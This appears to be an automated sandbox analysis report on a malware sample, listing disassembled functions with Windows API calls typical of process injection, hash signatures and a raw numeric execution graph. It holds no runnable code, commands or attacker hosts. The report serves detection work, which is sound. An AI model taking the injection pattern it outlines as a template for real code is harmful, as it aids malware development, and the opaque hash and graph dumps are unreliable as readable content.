                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 2c33700c40b15533935ac47a9780bd53f51dff523946fb484c00debce7ac8cc6
                                                                                              • Instruction ID: 64b43f8a938073ec413f3334db8134c258bb718f6bc2dcbee74a5b52557ea581
                                                                                              • Opcode Fuzzy Hash: 2c33700c40b15533935ac47a9780bd53f51dff523946fb484c00debce7ac8cc6
                                                                                              • Instruction Fuzzy Hash: DF2126B19003199FCF10DFAAC884BEEBBF5FF48314F50842AE918A7241D7789944DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07928B90 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1363 7928b90-7928c1d ReadProcessMemory 1366 7928c26-7928c56 1363->1366 1367 7928c1f-7928c25 1363->1367 1367->1366
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07928C10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 17877f494cc9b67453d02d612c32b59e18f9342559deb9fbb18bbfe37ed16753
                                                                                              • Instruction ID: eefa45e64e4c524d2b2ffb19222fde850390557b8f2b5ae88faccc693520e089
                                                                                              • Opcode Fuzzy Hash: 17877f494cc9b67453d02d612c32b59e18f9342559deb9fbb18bbfe37ed16753
                                                                                              • Instruction Fuzzy Hash: FD2116B18003199FCB10DFAAC880AEEBBF5FF48310F50842AE918A7250D7789944DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07928798 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1353 7928798-79287e3 1355 79287f3-7928823 SetThreadContext 1353->1355 1356 79287e5-79287f1 1353->1356 1358 7928825-792882b 1355->1358 1359 792882c-792885c 1355->1359 1356->1355 1358->1359
                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 07928816
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: b368551b4bf545ce424aa20e58baabee1e08c56fecef562813495442f8ef892e
                                                                                              • Instruction ID: 6e81a8b3e5da3601d098e1e3f3eb015f40f81f1d8e2761e2f792a932c8b9a7b8
                                                                                              • Opcode Fuzzy Hash: b368551b4bf545ce424aa20e58baabee1e08c56fecef562813495442f8ef892e
                                                                                              • Instruction Fuzzy Hash: 452137B1D002098FCB10DFAAC484BEEBBF5EB88324F54842AD419A7340DB789945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07928980 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1371 7928980-79289fb VirtualAllocEx 1374 7928a04-7928a29 1371->1374 1375 79289fd-7928a03 1371->1375 1375->1374
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079289EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: cfdba73179d52ea0794c2f64a935576d0dad6183b90739dbd7fe1a349d04d8ff
                                                                                              • Instruction ID: a04b06d3f814a74341ffee7c7e5a0583b0cdc0c11690bf4986633cac63ec576b
                                                                                              • Opcode Fuzzy Hash: cfdba73179d52ea0794c2f64a935576d0dad6183b90739dbd7fe1a349d04d8ff
                                                                                              • Instruction Fuzzy Hash: 6E11F9719002499FCF10DFAAC844ADFBFF5AB88324F148819E559A7250C7799544DFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 079286B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1379 79286b8-7928727 ResumeThread 1382 7928730-7928755 1379->1382 1383 7928729-792872f 1379->1383 1383->1382
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: fc65b7a8403dc35e3f6f77fe44b0149e8853bd072c5147630cda1144839c72d2
                                                                                              • Instruction ID: 79a712c3166750f3844558fe32ec7e4fb762aadc5548696e8a9e5174b4c5b726
                                                                                              • Opcode Fuzzy Hash: fc65b7a8403dc35e3f6f77fe44b0149e8853bd072c5147630cda1144839c72d2
                                                                                              • Instruction Fuzzy Hash: F311F8B1D002598BDB10EFAAC4447DEFBF9AB88324F148819D419B7340DB78A945CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 059C0C18 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1387 59c0c18-59c0c8a SetWindowLongW 1388 59c0c8c-59c0c92 1387->1388 1389 59c0c93-59c0ca7 1387->1389 1388->1389
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 059C0C7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 3cf34a1fb91dd447039662b7d0ee71eaef5564ce6e5a58b6c1aee39c094dffe2
                                                                                              • Instruction ID: 1773b2f9202fe83b1c1409ede77565be0c5d205d089bd328fc2188abf837380e
                                                                                              • Opcode Fuzzy Hash: 3cf34a1fb91dd447039662b7d0ee71eaef5564ce6e5a58b6c1aee39c094dffe2
                                                                                              • Instruction Fuzzy Hash: 081100B5800209CFDB10CF9AD588BDEBBF8EB48324F24845AD859B7701C378A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 059C0C20 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1391 59c0c20-59c0c8a SetWindowLongW 1392 59c0c8c-59c0c92 1391->1392 1393 59c0c93-59c0ca7 1391->1393 1392->1393
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 059C0C7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.280013423.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_59c0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 673e7352e63d755ad620288190adf8329dc75bcff39e44753e33363fd24c9083
                                                                                              • Instruction ID: eb717d93c30d152c1a84c8c24267d68bb15f4eacb9e5a5c2f1719908829a6ca1
                                                                                              • Opcode Fuzzy Hash: 673e7352e63d755ad620288190adf8329dc75bcff39e44753e33363fd24c9083
                                                                                              • Instruction Fuzzy Hash: FE11D3B5800209DFDB10DF9AD584BDEBBF8EB48324F14845AD859A7700D374A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07DB9580 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1395 7db9580-7db95ea PostMessageW 1396 7db95ec-7db95f2 1395->1396 1397 7db95f3-7db9607 1395->1397 1396->1397
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07DB95DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.292995710.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7db0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 3214d31ceefc7b4cf8be47904072b61dc3fa4ad4f20ecd21b3b9424a74f4550d
                                                                                              • Instruction ID: 132be07f9e032657712210471345b3b547c16ba21c5fd205229b5cc740ebc1b6
                                                                                              • Opcode Fuzzy Hash: 3214d31ceefc7b4cf8be47904072b61dc3fa4ad4f20ecd21b3b9424a74f4550d
                                                                                              • Instruction Fuzzy Hash: 6411D3B5800249DFDB20DF9AD884BDEFBF8EB48324F10841AE555A7700D374A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0163D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69821a3814c6228ef2c74399339e19f635f159d3695314e74699835c64ed6a37
                                                                                              • Instruction ID: ba4178203d3cc13b562d5a5e5ffe8908cb0268581e88105a245134f5c442eeb7
                                                                                              • Opcode Fuzzy Hash: 69821a3814c6228ef2c74399339e19f635f159d3695314e74699835c64ed6a37
                                                                                              • Instruction Fuzzy Hash: 4A21C1B2504240DFDB16DF58D9C0B26BF66FBC8328F64C569E8050B287C336D456CAA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0164D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe672e9b10bc8116894a8b7d584f32f4f03304c66f1d66980d8f1d25f3d086c9
                                                                                              • Instruction ID: 0de84276f24b3063c07ed8e751d71a0788319cdc607b75e4815ff67cacf9184b
                                                                                              • Opcode Fuzzy Hash: fe672e9b10bc8116894a8b7d584f32f4f03304c66f1d66980d8f1d25f3d086c9
                                                                                              • Instruction Fuzzy Hash: BB21DA71904240DFDB06DF54D9C0B16BBA5FB94324F24C66DE9495B346C336D446CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0164D01C Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 87595d79fbff49c8c5818efcd0895cdaec4747cc297217b64fceef8d2e1e0d68
                                                                                              • Instruction ID: b80df6f42b548c216d661f3fb30a97e8f38899bbab6504e618e2a5cbc830fcdf
                                                                                              • Opcode Fuzzy Hash: 87595d79fbff49c8c5818efcd0895cdaec4747cc297217b64fceef8d2e1e0d68
                                                                                              • Instruction Fuzzy Hash: 55212271A04240DFDB15CF58D8C0B26BB65FB98B54F24C569E80A0B386C33AD847CA61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0163D4BF Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb067d5dad88413f3e34b132bb63acaa0c988591488faadeeb326543b5c515d9
                                                                                              • Instruction ID: 768e79d6f4889126f9e05a4aee4e53c8688a905456ac31f3e9248dc4c3c48497
                                                                                              • Opcode Fuzzy Hash: fb067d5dad88413f3e34b132bb63acaa0c988591488faadeeb326543b5c515d9
                                                                                              • Instruction Fuzzy Hash: 7311B176904280DFDB12CF54D9C4B16BF72FB84324F24C6A9D8450B656C33AD456CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0164D017 Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21427ca23a48a55dcad0e3d484f99097b9453c19b67056f3b82d25d18eec669f
                                                                                              • Instruction ID: 4098aab41dbbbe9208496f64d9fd55e89057c05ad90d3587eaaa42fb131bec84
                                                                                              • Opcode Fuzzy Hash: 21427ca23a48a55dcad0e3d484f99097b9453c19b67056f3b82d25d18eec669f
                                                                                              • Instruction Fuzzy Hash: 3C11BE75904280CFDB12CF54D9C4B15BB62FB84714F24C6A9D8494B756C33AD44ACB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0164D1CF Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273127237.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_164d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21427ca23a48a55dcad0e3d484f99097b9453c19b67056f3b82d25d18eec669f
                                                                                              • Instruction ID: 530475426a2944a4e117216272943b6d345a98bcf41424abbaf0dedc76cb2a6b
                                                                                              • Opcode Fuzzy Hash: 21427ca23a48a55dcad0e3d484f99097b9453c19b67056f3b82d25d18eec669f
                                                                                              • Instruction Fuzzy Hash: 7611BB76904280DFDB12CF54D9C4B16BBB2FB84224F28C6A9D9494B756C33AD44ACB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0163D745 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a1ec5efadea7ba40690c1c4f584c0a6861f8a64ac1bf2101d39a928299688468
                                                                                              • Instruction ID: 9e7392762e984372b299370c0fe846cfc747a0f62d3be039e565d2f8ddd1737c
                                                                                              • Opcode Fuzzy Hash: a1ec5efadea7ba40690c1c4f584c0a6861f8a64ac1bf2101d39a928299688468
                                                                                              • Instruction Fuzzy Hash: 3A01F7314083C09AE7124A69CC84B76BFA8EFC1274F48C51AED081A386D3789845CAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0163D744 Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.273080897.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_163d000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5f7dd94003fa79fc4f47795e666dc2fce81d4d0521c4b00e47dbcb49843c9cb
                                                                                              • Instruction ID: b0a3be5bc5003f60ba7bfe09fb308836066e46c47fe7dca6f22f12eb2e7ff23a
                                                                                              • Opcode Fuzzy Hash: d5f7dd94003fa79fc4f47795e666dc2fce81d4d0521c4b00e47dbcb49843c9cb
                                                                                              • Instruction Fuzzy Hash: 76F096714043849EE7128E1ADCC4B72FFE8EB81774F18C55AED485B386D3799844CAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 07DB0040 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.292995710.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7db0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ^$y
                                                                                              • API String ID: 0-1095955094
                                                                                              • Opcode ID: 5ecedc75ffbe613bac1e5eeaa26d9c62a89285c8abe077c93c8124c3d88aa2dc
                                                                                              • Instruction ID: 876559ecb15494c7c82cfa31c6348b70036ad6120a8a26d850d1685a2c332deb
                                                                                              • Opcode Fuzzy Hash: 5ecedc75ffbe613bac1e5eeaa26d9c62a89285c8abe077c93c8124c3d88aa2dc
                                                                                              • Instruction Fuzzy Hash: FA411FB1E016188BEB6CCF6BCD4438EFAF3AFC9200F14C1BA840DA6215EB3506958F55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 079203A0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ]
                                                                                              • API String ID: 0-3352871620
                                                                                              • Opcode ID: d4ee99e067dd7453301a3e81bf0c1c4975a5aae3dab02368d97d7148b64db67d
                                                                                              • Instruction ID: be3744bb0b69b389bbfa1143f752e3d5acbb6cf1187d42a4cc5dbf8a1155173f
                                                                                              • Opcode Fuzzy Hash: d4ee99e067dd7453301a3e81bf0c1c4975a5aae3dab02368d97d7148b64db67d
                                                                                              • Instruction Fuzzy Hash: 714151B1D056688BEB6CDF6B8D40789FAF7AFC9204F14C1FA840DA7214DB710A968F51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07920391 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ]
                                                                                              • API String ID: 0-3352871620
                                                                                              • Opcode ID: 673fb4bccc68e27bbd311336ca8ede154c79b0c9d3701ef0a0dd0fb9a802d9a6
                                                                                              • Instruction ID: 2dbf149c716e514c95777414bc674034a2342904ef279d62bd478e19d61c82a3
                                                                                              • Opcode Fuzzy Hash: 673fb4bccc68e27bbd311336ca8ede154c79b0c9d3701ef0a0dd0fb9a802d9a6
                                                                                              • Instruction Fuzzy Hash: 5F4146B1E056288BEB5CCF5B8D4078AFAF7AFC5210F14C1FA940CAB614EB3109928F51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 079200F0 Relevance: .2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53f7f0866a65b8ce39c28561980cbb59c73f0619023649971239954c4e82af8b
                                                                                              • Instruction ID: a6e2a34c26df4e0f6fcab7a6fd4041cc0d3f4ea9758b09e23032370333935e6e
                                                                                              • Opcode Fuzzy Hash: 53f7f0866a65b8ce39c28561980cbb59c73f0619023649971239954c4e82af8b
                                                                                              • Instruction Fuzzy Hash: 7A612B70A0464A8FE748DF6AE84168E7BF3FBC8300F14C929D005AB765EF785906CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07920100 Relevance: .2, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.291541793.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7920000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4f8c7b5997c639a632f50a4b1798fa57daa876e9cc9df529b86d07185b293c4
                                                                                              • Instruction ID: ee5ffc58d3161db2fe3824ad272b310534f78744ce1f204c4886f5fdeb8f4e09
                                                                                              • Opcode Fuzzy Hash: b4f8c7b5997c639a632f50a4b1798fa57daa876e9cc9df529b86d07185b293c4
                                                                                              • Instruction Fuzzy Hash: 92610B70A1164A8FE744EF6AE85168E7BF3FBC8304F14C929D005AB765EF785906CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07DB0007 Relevance: .1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.292995710.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7db0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cef949c5fef3860ac8fc7fb4772b245a6d59923796fa4c8fe2c90568b2087180
                                                                                              • Instruction ID: d90653c7e2d667c17bb255be3c2f5c7b6c4ee7b4f66efbee90666dc66ef3c9b3
                                                                                              • Opcode Fuzzy Hash: cef949c5fef3860ac8fc7fb4772b245a6d59923796fa4c8fe2c90568b2087180
                                                                                              • Instruction Fuzzy Hash: AB415EB1E456548FE71DCF6B9C402CAFBF3AFC9210F18C1BA940CAB265EB3509468E55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:14.2%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0.9%
                                                                                              Total number of Nodes:325
                                                                                              Total number of Limit Nodes:41
                                                                                              execution_graph 33823 2aa0448 33824 2aa044d 33823->33824 33825 2aa048f 33824->33825 33833 6772838 33824->33833 33837 6772828 33824->33837 33841 2aa0e00 33824->33841 33846 2aa0b40 33824->33846 33851 2aa0f32 33824->33851 33865 2aa0b32 33824->33865 33870 2aa0df0 33824->33870 33834 6772847 33833->33834 33875 677222c 33834->33875 33838 6772847 33837->33838 33839 677222c 4 API calls 33838->33839 33840 6772868 33839->33840 33840->33824 33843 2aa0e06 33841->33843 33842 2aa0f29 33842->33824 33843->33842 33844 2aa0f32 2 API calls 33843->33844 33993 2aa1062 33843->33993 33844->33843 33848 2aa0b60 33846->33848 33847 2aa0dda 33847->33824 33848->33847 33849 2aa0f32 2 API calls 33848->33849 33850 2aa1062 2 API calls 33848->33850 33849->33848 33850->33848 33852 2aa0e06 33851->33852 33856 2aa0f3b 33851->33856 33855 2aa0f29 33852->33855 33863 2aa0f32 2 API calls 33852->33863 33864 2aa1062 2 API calls 33852->33864 33853 2aa1056 33853->33824 33854 2aa0b40 2 API calls 33854->33856 33855->33824 33856->33853 33856->33854 33857 2aaf4d8 GetUserNameW 33856->33857 33858 2aaf4c9 GetUserNameW 33856->33858 33859 2aaf7ff 2 API calls 33856->33859 33860 2aaf810 2 API calls 33856->33860 33861 2aa1062 2 API calls 33856->33861 33862 2aa1070 2 API calls 33856->33862 33857->33856 33858->33856 33859->33856 33860->33856 33861->33856 33862->33856 33863->33852 33864->33852 33867 2aa0b60 33865->33867 33866 2aa0dda 33866->33824 33867->33866 33868 2aa0f32 2 API calls 33867->33868 33869 2aa1062 2 API calls 33867->33869 33868->33867 33869->33867 33872 2aa0df3 33870->33872 33871 2aa0f29 33871->33824 33872->33871 33873 2aa0f32 2 API calls 33872->33873 33874 2aa1062 2 API calls 33872->33874 33873->33872 33874->33872 33876 6772237 33875->33876 33879 6773694 33876->33879 33881 677369f 33879->33881 33880 67748d6 33881->33880 33884 6776d28 33881->33884 33889 6776d18 33881->33889 33885 6776d49 33884->33885 33886 6776d6d 33885->33886 33895 6776ec8 33885->33895 33899 6776ed8 33885->33899 33886->33880 33890 6776d13 33889->33890 33892 6776d22 33889->33892 33890->33880 33891 6776d6d 33891->33880 33892->33891 33893 6776ed8 4 API calls 33892->33893 33894 6776ec8 4 API calls 33892->33894 33893->33891 33894->33891 33896 6776ed8 33895->33896 33897 6776f1e 33896->33897 33903 6774fb8 33896->33903 33897->33886 33900 6776ee5 33899->33900 33901 6776f1e 33900->33901 33902 6774fb8 4 API calls 33900->33902 33901->33886 33902->33901 33904 6774fc3 33903->33904 33906 6776f90 33904->33906 33907 6774fec 33904->33907 33906->33906 33908 6774ff7 33907->33908 33914 6774ffc 33908->33914 33910 6776fff 33918 677cd30 33910->33918 33927 677cd40 33910->33927 33911 6777038 33911->33906 33917 6775007 33914->33917 33915 6777734 33915->33910 33916 6776d28 4 API calls 33916->33915 33917->33915 33917->33916 33920 677cd71 33918->33920 33921 677ce62 33918->33921 33919 677cd7d 33919->33911 33920->33919 33936 677cfa8 33920->33936 33940 677cf98 33920->33940 33921->33911 33922 677cdbd 33945 677e250 33922->33945 33953 677e2f0 33922->33953 33929 677cd71 33927->33929 33930 677ce62 33927->33930 33928 677cd7d 33928->33911 33929->33928 33932 677cfa8 4 API calls 33929->33932 33933 677cf98 4 API calls 33929->33933 33930->33911 33931 677cdbd 33934 677e250 GetModuleHandleW 33931->33934 33935 677e2f0 GetModuleHandleW 33931->33935 33932->33931 33933->33931 33934->33930 33935->33930 33960 677cff8 33936->33960 33969 677cfe8 33936->33969 33937 677cfb2 33937->33922 33941 677cfa7 33940->33941 33942 677cf4a 33940->33942 33943 677cff8 3 API calls 33941->33943 33944 677cfe8 3 API calls 33941->33944 33942->33922 33943->33942 33944->33942 33946 677e25e 33945->33946 33947 677e2db 33945->33947 33946->33921 33979 677e810 33947->33979 33984 677e840 33947->33984 33948 677e398 33949 677bf74 